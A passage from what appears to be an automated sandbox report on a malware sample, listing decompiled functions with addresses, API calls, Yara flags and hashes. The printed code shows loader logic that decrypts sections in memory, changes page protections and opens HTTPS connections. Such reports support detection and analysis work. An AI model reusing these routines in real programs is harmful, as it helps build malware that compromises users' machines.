                                                                                                                                                                                                                                0x02bb5e3d
                                                                                                                                                                                                                                0x02bb5e40
                                                                                                                                                                                                                                0x02bb5e40
                                                                                                                                                                                                                                0x02bb5e43
                                                                                                                                                                                                                                0x02bb5e47
                                                                                                                                                                                                                                0x02bb5e4a
                                                                                                                                                                                                                                0x02bb5e50
                                                                                                                                                                                                                                0x02bb5e53
                                                                                                                                                                                                                                0x02bb5e5a
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x02bb5dd6
                                                                                                                                                                                                                                0x02bb5d51
                                                                                                                                                                                                                                0x02bb5d59
                                                                                                                                                                                                                                0x02bb5d5f
                                                                                                                                                                                                                                0x02bb5d61
                                                                                                                                                                                                                                0x02bb5d61
                                                                                                                                                                                                                                0x02bb5d64
                                                                                                                                                                                                                                0x02bb5d66
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x02bb5d66
                                                                                                                                                                                                                                0x02bb5d40
                                                                                                                                                                                                                                0x02bb5d86
                                                                                                                                                                                                                                0x02bb5d8b
                                                                                                                                                                                                                                0x02bb5d8d
                                                                                                                                                                                                                                0x02bb5d8d
                                                                                                                                                                                                                                0x02bb5d90
                                                                                                                                                                                                                                0x02bb5d90
                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 02BB5157: RtlAllocateHeap.NTDLL(00000000,00000000,02BB1259), ref: 02BB5163
                                                                                                                                                                                                                                • lstrcpy.KERNEL32(69B25F45,00000020), ref: 02BB5DFA
                                                                                                                                                                                                                                • lstrcat.KERNEL32(69B25F45,00000020), ref: 02BB5E0F
                                                                                                                                                                                                                                • lstrcmp.KERNEL32(00000000,69B25F45), ref: 02BB5E26
                                                                                                                                                                                                                                • lstrlen.KERNEL32(69B25F45), ref: 02BB5E4A
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.881075443.0000000002BB1000.00000020.00020000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881068169.0000000002BB0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881104776.0000000002BBC000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881116688.0000000002BBD000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881125153.0000000002BBF000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AllocateHeaplstrcatlstrcmplstrcpylstrlen
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3214092121-3916222277
                                                                                                                                                                                                                                • Opcode ID: a8a95f12b35723e36ff2491d9e86f38652d403a513ca2b1563a2be3edf512bc3
                                                                                                                                                                                                                                • Instruction ID: 62e23eff94fa109675dc3e32ff95e3d52200699b0d23bcb4b8d6d83789e8842e
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a8a95f12b35723e36ff2491d9e86f38652d403a513ca2b1563a2be3edf512bc3
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 51519275A00108EFDF32CF99C584AFDBBB6FF45354F94819AE8159B201C7B0AA51CB92
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 02BB2932, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 94memoryCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                			E02BB2932(void* __edx) {
				void* _v8;
				int _v12;
				WCHAR* _v16;
				void* __edi;
				void* __esi;
				void* _t23;
				intOrPtr _t24;
				void* _t26;
				intOrPtr _t32;
				intOrPtr _t35;
				void* _t37;
				intOrPtr _t38;
				void* _t40;
				intOrPtr _t42;
				void* _t45;
				void* _t50;
				void* _t52;

				_t50 = __edx;
				_v12 = 0;
				_t23 = E02BB9B32(0,  &_v8); // executed
				if(_t23 != 0) {
					_v8 = 0;
				}
				_t24 =  *0x2bbd2e0; // 0x273a5a8
				_t4 = _t24 + 0x2bbedc8; // 0x52f9370
				_t5 = _t24 + 0x2bbed70; // 0x4f0053
				_t26 = E02BB779A( &_v16, _v8, _t5, _t4); // executed
				_t45 = _t26;
				if(_t45 == 0) {
					StrToIntExW(_v16, 0,  &_v12);
					_t45 = 8;
					if(_v12 < _t45) {
						_t45 = 1;
						__eflags = 1;
					} else {
						_t32 =  *0x2bbd2e0; // 0x273a5a8
						_t11 = _t32 + 0x2bbedbc; // 0x52f9364
						_t48 = _t11;
						_t12 = _t32 + 0x2bbed70; // 0x4f0053
						_t52 = E02BB1FCE(_t11, _t12, _t11);
						_t59 = _t52;
						if(_t52 != 0) {
							_t35 =  *0x2bbd2e0; // 0x273a5a8
							_t13 = _t35 + 0x2bbee06; // 0x30314549
							_t37 = E02BB2AE3(_t48, _t50, _t59, _v8, _t52, _t13, 0x14); // executed
							if(_t37 == 0) {
								_t61 =  *0x2bbd294 - 6;
								if( *0x2bbd294 <= 6) {
									_t42 =  *0x2bbd2e0; // 0x273a5a8
									_t15 = _t42 + 0x2bbec12; // 0x52384549
									E02BB2AE3(_t48, _t50, _t61, _v8, _t52, _t15, 0x13);
								}
							}
							_t38 =  *0x2bbd2e0; // 0x273a5a8
							_t17 = _t38 + 0x2bbee00; // 0x52f93a8
							_t18 = _t38 + 0x2bbedd8; // 0x680043
							_t40 = E02BB9BED(_v8, 0x80000001, _t52, _t18, _t17); // executed
							_t45 = _t40;
							HeapFree( *0x2bbd270, 0, _t52);
						}
					}
					HeapFree( *0x2bbd270, 0, _v16);
				}
				_t54 = _v8;
				if(_v8 != 0) {
					E02BB704F(_t54);
				}
				return _t45;
			}




















                                                                                                                                                                                                                                0x02bb2932
                                                                                                                                                                                                                                0x02bb2942
                                                                                                                                                                                                                                0x02bb2945
                                                                                                                                                                                                                                0x02bb294c
                                                                                                                                                                                                                                0x02bb294e
                                                                                                                                                                                                                                0x02bb294e
                                                                                                                                                                                                                                0x02bb2951
                                                                                                                                                                                                                                0x02bb2956
                                                                                                                                                                                                                                0x02bb295d
                                                                                                                                                                                                                                0x02bb296a
                                                                                                                                                                                                                                0x02bb296f
                                                                                                                                                                                                                                0x02bb2973
                                                                                                                                                                                                                                0x02bb2981
                                                                                                                                                                                                                                0x02bb298f
                                                                                                                                                                                                                                0x02bb2993
                                                                                                                                                                                                                                0x02bb2a24
                                                                                                                                                                                                                                0x02bb2a24
                                                                                                                                                                                                                                0x02bb2999
                                                                                                                                                                                                                                0x02bb2999
                                                                                                                                                                                                                                0x02bb299e
                                                                                                                                                                                                                                0x02bb299e
                                                                                                                                                                                                                                0x02bb29a5
                                                                                                                                                                                                                                0x02bb29b1
                                                                                                                                                                                                                                0x02bb29b3
                                                                                                                                                                                                                                0x02bb29b5
                                                                                                                                                                                                                                0x02bb29b7
                                                                                                                                                                                                                                0x02bb29be
                                                                                                                                                                                                                                0x02bb29c9
                                                                                                                                                                                                                                0x02bb29d0
                                                                                                                                                                                                                                0x02bb29d2
                                                                                                                                                                                                                                0x02bb29d9
                                                                                                                                                                                                                                0x02bb29db
                                                                                                                                                                                                                                0x02bb29e2
                                                                                                                                                                                                                                0x02bb29ed
                                                                                                                                                                                                                                0x02bb29ed
                                                                                                                                                                                                                                0x02bb29d9
                                                                                                                                                                                                                                0x02bb29f2
                                                                                                                                                                                                                                0x02bb29f7
                                                                                                                                                                                                                                0x02bb29fe
                                                                                                                                                                                                                                0x02bb2a0e
                                                                                                                                                                                                                                0x02bb2a1c
                                                                                                                                                                                                                                0x02bb2a1e
                                                                                                                                                                                                                                0x02bb2a1e
                                                                                                                                                                                                                                0x02bb29b5
                                                                                                                                                                                                                                0x02bb2a30
                                                                                                                                                                                                                                0x02bb2a30
                                                                                                                                                                                                                                0x02bb2a32
                                                                                                                                                                                                                                0x02bb2a37
                                                                                                                                                                                                                                0x02bb2a39
                                                                                                                                                                                                                                0x02bb2a39
                                                                                                                                                                                                                                0x02bb2a44

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,052F9370,00000000,?,747DF710,00000000,747DF730), ref: 02BB2981
                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,052F93A8,?,00000000,30314549,00000014,004F0053,052F9364), ref: 02BB2A1E
                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,02BBA080), ref: 02BB2A30
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.881075443.0000000002BB1000.00000020.00020000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881068169.0000000002BB0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881104776.0000000002BBC000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881116688.0000000002BBD000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881125153.0000000002BBF000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: FreeHeap
                                                                                                                                                                                                                                • String ID: Uxt
                                                                                                                                                                                                                                • API String ID: 3298025750-1536154274
                                                                                                                                                                                                                                • Opcode ID: 245aa251321990a28751f73d190e60c86be8ba8c22b2fe628e85ccc7ecada926
                                                                                                                                                                                                                                • Instruction ID: 937aa9802577da0195a5f2f935ccfa43ee946bcec00a8c3ba21165ceb8f0d9c0
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 245aa251321990a28751f73d190e60c86be8ba8c22b2fe628e85ccc7ecada926
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FA31CF32D00109BFDB23DBA4DD84EEA7BBDFF48740F1604A9AA01A7060D7F0AA15DB50
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 02B81B7F, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 68memoryCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 87%
                                                                                                                                                                                                                                			E02B81B7F(void* __eax, void* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				long _v20;
				int _t43;
				long _t54;
				signed int _t57;
				void* _t58;
				signed int _t60;

				_v12 = _v12 & 0x00000000;
				_t57 =  *0x2b841c0;
				_t58 = ( *(__eax + 0x14) & 0x0000ffff) + __eax + 0x18;
				_v16 =  *(__eax + 6) & 0x0000ffff;
				VirtualProtect(_a4,  *(__eax + 0x54), _t57 - 0x69b25f40,  &_v20); // executed
				_v8 = _v8 & 0x00000000;
				if(_v16 <= 0) {
					L12:
					return _v12;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t60 = _v12;
					if(_t60 != 0) {
						goto L12;
					}
					asm("bt [esi+0x24], eax");
					if(_t60 >= 0) {
						asm("bt [esi+0x24], eax");
						if(__eflags >= 0) {
							L8:
							_t54 = _t57 - 0x69b25f40;
							L9:
							_t43 = VirtualProtect( *((intOrPtr*)(_t58 + 0xc)) + _a4,  *(_t58 + 8), _t54,  &_v20); // executed
							if(_t43 == 0) {
								_v12 = GetLastError();
							}
							_v8 = _v8 + 1;
							_t58 = _t58 + 0x7c211d88 + _t57 * 0x28;
							if(_v8 < _v16) {
								continue;
							} else {
								goto L12;
							}
						}
						asm("bt [esi+0x24], eax");
						_t54 = _t57 - 0x69b25f42;
						if(__eflags >= 0) {
							goto L9;
						}
						goto L8;
					}
					asm("bt [esi+0x24], eax");
					if(_t60 >= 0) {
						_t54 = _t57 - 0x69b25f24;
					} else {
						_t54 = _t57 - 0x69b25f04;
					}
					goto L9;
				}
				goto L12;
			}












                                                                                                                                                                                                                                0x02b81b89
                                                                                                                                                                                                                                0x02b81b96
                                                                                                                                                                                                                                0x02b81b9c
                                                                                                                                                                                                                                0x02b81ba8
                                                                                                                                                                                                                                0x02b81bb8
                                                                                                                                                                                                                                0x02b81bba
                                                                                                                                                                                                                                0x02b81bc2
                                                                                                                                                                                                                                0x02b81c57
                                                                                                                                                                                                                                0x02b81c5e
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x02b81bc8
                                                                                                                                                                                                                                0x02b81bc8
                                                                                                                                                                                                                                0x02b81bc8
                                                                                                                                                                                                                                0x02b81bcc
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x02b81bd8
                                                                                                                                                                                                                                0x02b81bdc
                                                                                                                                                                                                                                0x02b81c00
                                                                                                                                                                                                                                0x02b81c04
                                                                                                                                                                                                                                0x02b81c18
                                                                                                                                                                                                                                0x02b81c18
                                                                                                                                                                                                                                0x02b81c1e
                                                                                                                                                                                                                                0x02b81c2d
                                                                                                                                                                                                                                0x02b81c31
                                                                                                                                                                                                                                0x02b81c39
                                                                                                                                                                                                                                0x02b81c39
                                                                                                                                                                                                                                0x02b81c41
                                                                                                                                                                                                                                0x02b81c44
                                                                                                                                                                                                                                0x02b81c51
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x02b81c51
                                                                                                                                                                                                                                0x02b81c0c
                                                                                                                                                                                                                                0x02b81c10
                                                                                                                                                                                                                                0x02b81c16
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x02b81c16
                                                                                                                                                                                                                                0x02b81be4
                                                                                                                                                                                                                                0x02b81be8
                                                                                                                                                                                                                                0x02b81bf2
                                                                                                                                                                                                                                0x02b81bea
                                                                                                                                                                                                                                0x02b81bea
                                                                                                                                                                                                                                0x02b81bea
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x02b81be8
                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • VirtualProtect.KERNEL32(00000000,?,?,?,?,?,00000000,?,?), ref: 02B81BB8
                                                                                                                                                                                                                                • VirtualProtect.KERNEL32(00000000,?,?,?), ref: 02B81C2D
                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 02B81C33
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.881014887.0000000002B80000.00000040.00000010.sdmp, Offset: 02B80000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881042118.0000000002B85000.00000040.00000010.sdmp Download File
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ProtectVirtual$ErrorLast
                                                                                                                                                                                                                                • String ID: @Mxt MxtTxt
                                                                                                                                                                                                                                • API String ID: 1469625949-1084903527
                                                                                                                                                                                                                                • Opcode ID: ebdc20a3b7c333ec662d3ec7c1d2a8b8bba5f430d8f877bef071e8c055ea8ca2
                                                                                                                                                                                                                                • Instruction ID: 15afa2fc140c20e87ae14e5abf80d5dc49a6407506f4c91f54509c88b7598b20
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ebdc20a3b7c333ec662d3ec7c1d2a8b8bba5f430d8f877bef071e8c055ea8ca2
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4A215C7191120ADFCB14EF89C881ABAF7F4FB08344F41489AD20ADB004E7B4A666DF58
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 02B817CE, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 107memoryCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 89%
                                                                                                                                                                                                                                			E02B817CE(void* __edi, intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				char _v16;
				void* _v20;
				unsigned int _v24;
				intOrPtr _v28;
				char _v32;
				void* _v36;
				intOrPtr _v40;
				void* _v44;
				signed int _v52;
				signed int _v56;
				intOrPtr _t52;
				void* _t59;
				void* _t63;
				signed int _t69;
				void* _t71;
				intOrPtr _t72;
				intOrPtr _t79;
				intOrPtr _t84;
				intOrPtr* _t86;
				intOrPtr _t89;
				intOrPtr _t91;
				void* _t92;
				intOrPtr _t94;

				_t91 =  *0x2b841b0;
				_t52 = E02B81917(_t91,  &_v32,  &_v24);
				_v28 = _t52;
				if(_t52 == 0) {
					asm("sbb ebx, ebx");
					_t69 =  ~( ~(_v24 & 0x00000fff)) + (_v24 >> 0xc);
					_t92 = _t91 + _v32;
					_v44 = _t92;
					_t59 = VirtualAlloc(0, _t69 << 0xc, 0x3000, 4); // executed
					_t71 = _t59;
					_v36 = _t71;
					if(_t71 == 0) {
						_v28 = 8;
					} else {
						_v8 = _v8 & 0x00000000;
						if(_t69 <= 0) {
							_t72 =  *0x2b841c0;
						} else {
							_t84 = _a4;
							_v12 = _t92;
							_v12 = _v12 - _t71;
							_t16 = _t84 + 0x2b851a7; // 0x3220a9c2
							_t63 = _t59 - _t92 + _t16;
							_v20 = _t71;
							do {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_v16 = 0x400;
								_t94 = 0;
								_t86 = _v20;
								_v40 = (_v56 ^ _v52) - _v8 + _v32 + _a4 - 1;
								do {
									_t79 =  *((intOrPtr*)(_v12 + _t86));
									_t89 = _t79;
									if(_t79 == 0) {
										_v16 = 1;
									} else {
										 *_t86 = _t79 + _t94 - _v40;
										_t94 = _t89;
										_t86 = _t86 + 4;
									}
									_t33 =  &_v16;
									 *_t33 = _v16 - 1;
								} while ( *_t33 != 0);
								_v20 = _v20 + 0x1000;
								_t72 =  *((intOrPtr*)(_t63 + 0xc)) -  *((intOrPtr*)(_t63 + 8)) +  *((intOrPtr*)(_t63 + 4));
								_v8 = _v8 + 1;
								 *0x2b841c0 = _t72;
							} while (_v8 < _t69);
						}
						if(_t72 != 0x69b25f44) {
							_v28 = 9;
						} else {
							memcpy(_v44, _v36, _v24);
						}
						VirtualFree(_v36, 0, 0x8000); // executed
					}
				}
				return _v28;
			}




























                                                                                                                                                                                                                                0x02b817d5
                                                                                                                                                                                                                                0x02b817e5
                                                                                                                                                                                                                                0x02b817ea
                                                                                                                                                                                                                                0x02b817ef
                                                                                                                                                                                                                                0x02b81804
                                                                                                                                                                                                                                0x02b8180b
                                                                                                                                                                                                                                0x02b81810
                                                                                                                                                                                                                                0x02b81821
                                                                                                                                                                                                                                0x02b81824
                                                                                                                                                                                                                                0x02b8182a
                                                                                                                                                                                                                                0x02b8182c
                                                                                                                                                                                                                                0x02b81831
                                                                                                                                                                                                                                0x02b81907
                                                                                                                                                                                                                                0x02b81837
                                                                                                                                                                                                                                0x02b81837
                                                                                                                                                                                                                                0x02b8183d
                                                                                                                                                                                                                                0x02b818cd
                                                                                                                                                                                                                                0x02b81843
                                                                                                                                                                                                                                0x02b81843
                                                                                                                                                                                                                                0x02b81848
                                                                                                                                                                                                                                0x02b8184b
                                                                                                                                                                                                                                0x02b8184e
                                                                                                                                                                                                                                0x02b8184e
                                                                                                                                                                                                                                0x02b81855
                                                                                                                                                                                                                                0x02b81859
                                                                                                                                                                                                                                0x02b81864
                                                                                                                                                                                                                                0x02b81865
                                                                                                                                                                                                                                0x02b81866
                                                                                                                                                                                                                                0x02b8186d
                                                                                                                                                                                                                                0x02b8187a
                                                                                                                                                                                                                                0x02b81880
                                                                                                                                                                                                                                0x02b81883
                                                                                                                                                                                                                                0x02b81886
                                                                                                                                                                                                                                0x02b81889
                                                                                                                                                                                                                                0x02b8188c
                                                                                                                                                                                                                                0x02b81890
                                                                                                                                                                                                                                0x02b818a0
                                                                                                                                                                                                                                0x02b81892
                                                                                                                                                                                                                                0x02b81897
                                                                                                                                                                                                                                0x02b81899
                                                                                                                                                                                                                                0x02b8189b
                                                                                                                                                                                                                                0x02b8189b
                                                                                                                                                                                                                                0x02b818a7
                                                                                                                                                                                                                                0x02b818a7
                                                                                                                                                                                                                                0x02b818a7
                                                                                                                                                                                                                                0x02b818b2
                                                                                                                                                                                                                                0x02b818b9
                                                                                                                                                                                                                                0x02b818bc
                                                                                                                                                                                                                                0x02b818bf
                                                                                                                                                                                                                                0x02b818c5
                                                                                                                                                                                                                                0x02b818ca
                                                                                                                                                                                                                                0x02b818d9
                                                                                                                                                                                                                                0x02b818ee
                                                                                                                                                                                                                                0x02b818db
                                                                                                                                                                                                                                0x02b818e4
                                                                                                                                                                                                                                0x02b818e9
                                                                                                                                                                                                                                0x02b818ff
                                                                                                                                                                                                                                0x02b818ff
                                                                                                                                                                                                                                0x02b8190e
                                                                                                                                                                                                                                0x02b81914

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004,00000030,?,00000000,00000000,?,?,?,?,?,?,?,02B815E1), ref: 02B81824
                                                                                                                                                                                                                                • memcpy.NTDLL(?,?,00000000,?,?,?,?,?,?,?,02B815E1,00000000,00000030,747863F0,00000000), ref: 02B818E4
                                                                                                                                                                                                                                • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 02B818FF
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.881014887.0000000002B80000.00000040.00000010.sdmp, Offset: 02B80000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881042118.0000000002B85000.00000040.00000010.sdmp Download File
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Virtual$AllocFreememcpy
                                                                                                                                                                                                                                • String ID: Oct 27 2021
                                                                                                                                                                                                                                • API String ID: 4010158826-1702575778
                                                                                                                                                                                                                                • Opcode ID: 12d205c521ab05359e345cd2f882cb82816cba8eb4dad961dac7d78c708f8928
                                                                                                                                                                                                                                • Instruction ID: 6626969cffee2e8a88c0c09fd43f72f93e2df9a411d36270a049ac08f8bd7831
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 12d205c521ab05359e345cd2f882cb82816cba8eb4dad961dac7d78c708f8928
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E0417E71D1121ADFDB04DF98D891BEEBBB9FF08304F1041A9D909B7240D770AA46CB90
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 02BB4A6A, Relevance: 6.1, APIs: 4, Instructions: 104memoryCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • SysAllocString.OLEAUT32(80000002), ref: 02BB4AC7
                                                                                                                                                                                                                                • SysAllocString.OLEAUT32(02BB48F5), ref: 02BB4B0B
                                                                                                                                                                                                                                • SysFreeString.OLEAUT32(00000000), ref: 02BB4B1F
                                                                                                                                                                                                                                • SysFreeString.OLEAUT32(00000000), ref: 02BB4B2D
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.881075443.0000000002BB1000.00000020.00020000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881068169.0000000002BB0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881104776.0000000002BBC000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881116688.0000000002BBD000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881125153.0000000002BBF000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: String$AllocFree
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 344208780-0
                                                                                                                                                                                                                                • Opcode ID: 3c2b4b6518d435a5e010a2bb9fe12f4ce8b32af8c1416abb63c83f49cb2ed228
                                                                                                                                                                                                                                • Instruction ID: f7dfe7b12cd2c2cb80fdba6732fcd702aa3c94f4e4436a2678459ff4640c7d57
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3c2b4b6518d435a5e010a2bb9fe12f4ce8b32af8c1416abb63c83f49cb2ed228
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6D313B76900209EFCB16CF98D8D0AEE7BB9FF08340B10846EEA0697251D7B09A41CF65
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 02B81EB4, Relevance: 6.0, APIs: 4, Instructions: 30threadCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 87%
                                                                                                                                                                                                                                			E02B81EB4(void* __ecx, char _a4) {
				long _t3;
				int _t4;
				int _t9;
				void* _t13;

				_t13 = GetCurrentThread();
				_t3 = SetThreadAffinityMask(_t13, 1); // executed
				if(_t3 != 0) {
					SetThreadPriority(_t13, 0xffffffff); // executed
				}
				_t4 = E02B8156C(_a4); // executed
				_t9 = _t4;
				if(_t9 == 0) {
					SetThreadPriority(_t13, _t4);
				}
				asm("lock xadd [eax], ecx");
				return _t9;
			}







                                                                                                                                                                                                                                0x02b81ebd
                                                                                                                                                                                                                                0x02b81ec2
                                                                                                                                                                                                                                0x02b81ed0
                                                                                                                                                                                                                                0x02b81ed5
                                                                                                                                                                                                                                0x02b81ed5
                                                                                                                                                                                                                                0x02b81edb
                                                                                                                                                                                                                                0x02b81ee0
                                                                                                                                                                                                                                0x02b81ee4
                                                                                                                                                                                                                                0x02b81ee8
                                                                                                                                                                                                                                0x02b81ee8
                                                                                                                                                                                                                                0x02b81ef2
                                                                                                                                                                                                                                0x02b81efb

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetCurrentThread.KERNEL32 ref: 02B81EB7
                                                                                                                                                                                                                                • SetThreadAffinityMask.KERNEL32(00000000,00000001), ref: 02B81EC2
                                                                                                                                                                                                                                • SetThreadPriority.KERNEL32(00000000,000000FF), ref: 02B81ED5
                                                                                                                                                                                                                                • SetThreadPriority.KERNEL32(00000000,00000000,?), ref: 02B81EE8
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.881014887.0000000002B80000.00000040.00000010.sdmp, Offset: 02B80000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881042118.0000000002B85000.00000040.00000010.sdmp Download File
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Thread$Priority$AffinityCurrentMask
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1452675757-0
                                                                                                                                                                                                                                • Opcode ID: 36866f42513d02de4349aef9e0b6773589b59ed260e33b78f80ea553d2e11b41
                                                                                                                                                                                                                                • Instruction ID: 283da1d4f46757f99776b394d8be5d822a3a02016428235f43213db63b3342ff
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 36866f42513d02de4349aef9e0b6773589b59ed260e33b78f80ea553d2e11b41
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 28E09232B162116B92217A2D9C94F7B7BECEF92771B0102A5F62DD72D0CB908C12C9A5
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 02BB7648, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 124COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 23%
                                                                                                                                                                                                                                			E02BB7648(void* __ecx, intOrPtr* __esi, void* __eflags, signed int _a4, char _a8) {
				intOrPtr _v8;
				char _v12;
				void* _t34;
				long _t36;
				unsigned int _t37;
				void* _t38;
				intOrPtr _t39;
				void* _t40;
				intOrPtr _t42;
				intOrPtr _t43;
				intOrPtr _t45;
				void* _t56;
				intOrPtr _t57;
				void* _t63;
				intOrPtr* _t65;
				intOrPtr* _t66;
				void* _t69;

				_t66 = __esi;
				_t63 = E02BB3037(_t34, _a4);
				if(_t63 == 0) {
					L18:
					_t36 = GetLastError();
				} else {
					_t37 = GetVersion();
					_t69 = _t37 - 6;
					if(_t69 > 0) {
						L5:
						_a4 = 4;
					} else {
						if(_t69 != 0) {
							L4:
							_a4 = 0;
						} else {
							_t37 = _t37 >> 8;
							if(_t37 > 2) {
								goto L5;
							} else {
								goto L4;
							}
						}
					}
					__imp__(_t63, _a4, 0, 0, 0); // executed
					 *(_t66 + 0x10) = _t37;
					_t38 = E02BB53BB(_t63);
					if( *(_t66 + 0x10) == 0) {
						goto L18;
					} else {
						_t39 = E02BB3037(_t38,  *_t66);
						_v8 = _t39;
						if(_t39 == 0) {
							goto L18;
						} else {
							_t65 = __imp__; // 0x7021f5a0
							if(_a8 == 0) {
								L10:
								__imp__( *(_t66 + 0x10), _v8, 0x1bb, 0);
								 *((intOrPtr*)(_t66 + 0x14)) = _t39;
								_t40 = E02BB53BB(_v8);
								if( *((intOrPtr*)(_t66 + 0x14)) == 0) {
									goto L18;
								} else {
									_a4 = 0x800100;
									_t56 = E02BB3037(_t40,  *((intOrPtr*)(_t66 + 4)));
									if(_t56 == 0) {
										goto L18;
									} else {
